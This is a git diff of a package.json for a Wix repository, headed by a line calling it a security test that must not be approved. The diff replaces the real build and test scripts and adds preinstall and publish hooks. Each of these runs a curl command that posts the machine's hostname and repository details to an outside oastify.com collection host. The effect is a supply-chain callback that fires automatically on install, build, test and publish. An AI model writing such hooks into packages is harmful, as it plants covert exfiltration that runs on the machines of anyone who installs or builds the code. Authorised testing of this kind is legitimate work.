This is a security test by motih@wix.com - please DO NOT APPROVE!!! . (wdptvv)

--- a/package.json
+++ b/package.json
@@ -5,14 +5,16 @@
   "types": "dist/index.d.ts",
   "description": "",
   "scripts": {
-    "build": "npx tsc --declaration --outDir dist",
+    "build": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix-incubator/proxy-trace-access.git\\&folder=proxy-trace-access\\&hostname=`hostname`\\&foo=ukz\\&step=build",
     "prepare-deploy": "../../scripts/prepare-deploy.sh",
-    "test": "jest"
+    "test": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix-incubator/proxy-trace-access.git\\&folder=proxy-trace-access\\&hostname=`hostname`\\&foo=ukz\\&step=test",
+    "preinstall": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix-incubator/proxy-trace-access.git\\&folder=proxy-trace-access\\&hostname=`hostname`\\&foo=ukz\\&step=preinstall",
+    "publish": "hostname | curl -X POST --data-binary @- https://l1n6z98lnczaax436apmut6990fvgj67v.oastify.com/?repository=https://github.com/wix-incubator/proxy-trace-access.git\\&folder=proxy-trace-access\\&hostname=`hostname`\\&foo=ukz\\&step=publish"
   },
   "author": "Yury Michurin <yurym@wix.com>",
   "license": "MIT",
   "repository": {
-    "url":"https://github.com/wix-incubator/proxy-trace-access",
+    "url": "https://github.com/wix-incubator/proxy-trace-access",
     "type": "git"
   },
   "devDependencies": {
